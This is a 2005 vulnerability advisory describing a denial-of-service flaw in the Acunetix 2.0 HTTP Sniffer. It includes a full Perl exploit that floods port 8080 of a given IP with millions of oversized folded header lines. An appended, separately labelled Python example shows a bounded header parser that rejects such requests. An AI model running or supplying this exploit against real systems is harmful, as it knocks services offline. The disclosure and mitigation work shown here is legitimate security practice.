Update:
21:02 05/08/2005
Subject:
"Acunetix HTTP Sniffer Denial Of Service"
Vulnerable version:
Acunetix 2.0
Operating System:
- WINDOWS 95
- WINDOWS 98
- WINDOWS NT
- WINDOWS XP
Typical software:
commercial
Vendor URL:
Mail - support@Acunetix.com
WWW - www.Acunetix.com
Description:
Acunetix Web Vulnerability Scanner (WVS) tests the security of your website by crawling it and launching
popular attacks such as cross-site scripting, SQL injection and more. Identify vulnerabilities in shopping carts,
forms, secured areas and other web applications before hackers do! 75% of internet attacks are on web based
applications, because they frequently have access to confidential data and are positioned in front of the firewall.
Vulnerability:
A denial of service or buffer overflow condition occurs when a very
long text string or malicious code is sent to the service data application.
Sending such a denial of service request to the server application leaves a process hanging
with CPU usage at 100%, which can make the application stop responding.
The application must be terminated in order to end the hung processes.
Exploit:
#!/usr/bin/perl
#
# Acunetix HTTP Sniffer DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: www.acunetix.com
$ARGC=@ARGV;
if ($ARGC !=2) {
print "\n";
print " Acunetix HTTP Sniffer DOS Exploit\n";
print "-------------------------------------\n\n";
print "Usage: $0 [remote IP] \n";
print "Exam: $0 127.0.0.1\n";
exit;
}
use IO::Socket::INET;
$host=$ARGV[0];
$port= "8080";
print "\n";
print "[+] Connect to $host..\n";
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp')
|| die "[-] Connection error$@\n";
print "[+] Connected\n";
sleep(1);
print "[+] Build buffer..\n";
sleep(1);
$hostname="Host: $host";
$bufy='A'x50;
$bufa='A'x8183;
$len=length($bufy);
$buff="GET / HTTP/1.1\r\n";
sleep(1);
print "[+] Sending request..\n";
send($sock,$buff,0) || die "[-] send error:$@\n";
print "[+] Send DOS..";
for($i= 0; $i < 2000000; $i++)
{
$buff=" $bufa\r\n";
send($sock,$buff,0) || die "send error:$@\n[*] Check if server D0s'ed\n";
}
$buff="$hostname\r\n";
$buff.="Content-Length: $len\r\n";
$buff.="\r\n";
$buff.=$bufy."\r\n\r\n";
print "[+] Now kill the process..\n";
send($sock,$buff,0) || die "[-] send error:$@\n";
print "[+] DONE..Server Out of Memory\n";
close($sock);
Solution:
No fix at this moment.
The vendor has been contacted about this vulnerability.
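Added example (not part of the original advisory and not Acunetix code): the request the exploit above sends is a request line followed by a very long run of lines that start with a space, without reaching the blank line that ends the headers. A listener that parses request heads can bound what it buffers by capping line length, total head size and field count and by refusing folded lines; the limit values and all names below are assumptions.

```python
import io

# Assumed limits for illustration; tune to the traffic the listener must accept.
MAX_LINE = 8192            # bytes per line, including CRLF
MAX_HEAD_BYTES = 65536     # bytes for the request line plus all headers
MAX_HEADERS = 100          # distinct header fields per request

class HeadRejected(Exception):
    """The request head broke a limit; the caller should close the connection."""

def read_request_head(stream):
    """Parse request line and headers from a binary stream, enforcing the caps above."""
    total, request_line, headers = 0, None, {}
    while True:
        raw = stream.readline(MAX_LINE + 1)   # bounded read: at most MAX_LINE + 1 bytes
        if len(raw) > MAX_LINE:
            raise HeadRejected("line longer than MAX_LINE")
        if not raw.endswith(b"\n"):
            raise HeadRejected("stream ended before the blank line")
        total += len(raw)
        if total > MAX_HEAD_BYTES:
            raise HeadRejected("request head larger than MAX_HEAD_BYTES")
        line = raw.rstrip(b"\r\n")
        if request_line is None:
            request_line = line.decode("latin-1")
            continue
        if not line:                          # blank line: end of headers
            return request_line, headers
        if line[:1] in (b" ", b"\t"):
            # Folded continuation line, the shape the PoC repeats: reject, do not merge.
            raise HeadRejected("folded header line")
        name, sep, value = line.partition(b":")
        if not sep:
            raise HeadRejected("header line without a colon")
        if len(headers) >= MAX_HEADERS:
            raise HeadRejected("more than MAX_HEADERS header fields")
        headers[name.decode("latin-1").lower()] = value.strip().decode("latin-1")

def reason_rejected(data):
    """Return the rejection reason for raw bytes, or None if the head is accepted."""
    try:
        read_request_head(io.BytesIO(data))
    except HeadRejected as exc:
        return str(exc)
    return None

# Constructed sample inputs (in-memory only, not captured traffic).
NORMAL = b"GET / HTTP/1.1\r\nHost: example.test\r\nAccept: */*\r\n\r\n"
FOLDED = b"GET / HTTP/1.1\r\n" + (b" " + b"A" * 8183 + b"\r\n") * 3
```

On a real socket the same reader also needs a read timeout, since these caps bound memory but not how slowly a peer may send.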
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com